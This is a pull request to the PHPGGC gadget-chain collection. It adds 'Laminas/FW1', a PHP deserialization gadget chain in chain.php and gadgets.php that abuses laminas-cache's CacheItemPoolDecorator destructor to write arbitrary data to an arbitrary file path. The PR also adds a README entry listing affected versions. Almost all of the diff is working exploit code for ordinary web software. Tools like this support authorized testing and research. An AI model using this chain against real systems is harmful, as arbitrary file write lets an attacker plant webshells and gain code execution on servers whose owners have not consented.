### PR TITLE
Add Laminas/FW1

### DIFF
--- a/README.md
+++ b/README.md
@@ -32,6 +32,7 @@ Guzzle/INFO1                              6.0.0 <= 6.3.2                  phpinf
 Guzzle/RCE1                               6.0.0 <= 6.3.2                  RCE (Function call)    __destruct     *    
 Horde/RCE1                                <= 5.2.22                       RCE (PHP code)         __destruct     *    
 Laminas/FD1                               <= 2.11.2                       File delete            __destruct          
+Laminas/FW1                               2.8.0 <= 3.0.x-dev              File write             __destruct     *
 Laravel/RCE1                              5.4.27                          RCE (Function call)    __destruct          
 Laravel/RCE2                              5.5.39                          RCE (Function call)    __destruct          
 Laravel/RCE3                              5.5.39                          RCE (Function call)    __destruct     *    

--- a/gadgetchains/Laminas/FW/1/chain.php
+++ b/gadgetchains/Laminas/FW/1/chain.php
@@ -1,0 +1,39 @@
+<?php
+
+namespace GadgetChain\Laminas;
+
+use Laminas\Cache\Psr\CacheItemPool\{CacheItem, CacheItemPoolDecorator};
+use Laminas\Cache\Storage\Adapter\{Filesystem, FilesystemOptions};
+
+class FW1 extends \PHPGGC\GadgetChain\FileWrite
+{
+    public static $version = '2.8.0 <= 3.0.x-dev';
+    public static $vector = '__destruct';
+    public static $author = 'swapgs';
+    public static $information = '
+        This chain requires both laminas/laminas-cache (tested up to 3.0.x-dev) and
+        laminas/laminas-cache-storage-adapter-filesystem (a default dependency) to work.
+        Asking for a remote filename without extension will create a file with a trailing dot 
+        (e.g. asking for `foo` will create `foo.`)
+    ';
+
+    public function process_parameters($parameters)
+    {
+        $parameters = parent::process_parameters($parameters);
+        $infos = pathinfo($parameters['remote_path']);
+        $parameters['extension'] = isset($infos['extension']) ? $infos['extension'] : '';
+        $parameters['filename'] = isset($infos['filename']) ? $infos['filename'] : '';
+        $parameters['dirname'] = dirname($parameters['remote_path']);
+        return $parameters;
+    }
+
+    public function generate(array $parameters)
+    {
+        return new CacheItemPoolDecorator(
+            new Filesystem(
+                new FilesystemOptions($parameters['dirname'], $parameters['extension'])
+            ),
+            [new CacheItem($parameters['filename'], $parameters['data'])]
+        );
+    }
+}

--- a/gadgetchains/Laminas/FW/1/gadgets.php
+++ b/gadgetchains/Laminas/FW/1/gadgets.php
@@ -1,0 +1,69 @@
+<?php
+
+namespace Laminas\Cache\Storage\Adapter
+{
+    class AdapterOptions
+    {
+        protected $namespace;
+        protected $keyPattern;
+
+        function __construct()
+        {
+            $this->namespace = '';
+            $this->keyPattern = '/.*/';
+        }
+    }
+
+    class FilesystemOptions extends AdapterOptions
+    {
+        protected $cacheDir;
+        protected $dirLevel;
+        protected $suffix;
+
+        function __construct($cacheDir, $extension)
+        {
+            parent::__construct();
+            $this->cacheDir = $cacheDir;
+            $this->suffix = $extension;
+            $this->dirLevel = 0;
+        }
+    }
+
+    class Filesystem
+    {
+        protected $options;
+
+        function __construct($options)
+        {
+
+            $this->options = $options;
+        }
+    }
+}
+
+namespace Laminas\Cache\Psr\CacheItemPool
+{
+    class CacheItemPoolDecorator
+    {
+        protected $storage;
+        protected $deferred;
+
+        function __construct($storage, $deferred)
+        {
+            $this->storage = $storage;
+            $this->deferred = $deferred;
+        }
+    }
+
+    class CacheItem
+    {
+        protected $key;
+        protected $value;
+
+        function __construct($key, $value)
+        {
+            $this->key = $key;
+            $this->value = $value;
+        }
+    }
+}


### PR DESCRIPTION
This PR adds a FW chain for the framework Laminas. I used [phpggc_tester](https://github.com/Mayfly277/phpggc_tester) (really helpful tool, kudos!) to find out which versions are covered:

<img width="740" alt="image" src="https://user-images.githubusercontent.com/79814170/120848157-bb0cf980-c574-11eb-8712-d9a97f53cbb7.png">

Right now, this module does not support creating files without any extension, they will always have a trailing dot. It can probably be done with more work and a bigger chain 🤷‍♂️ 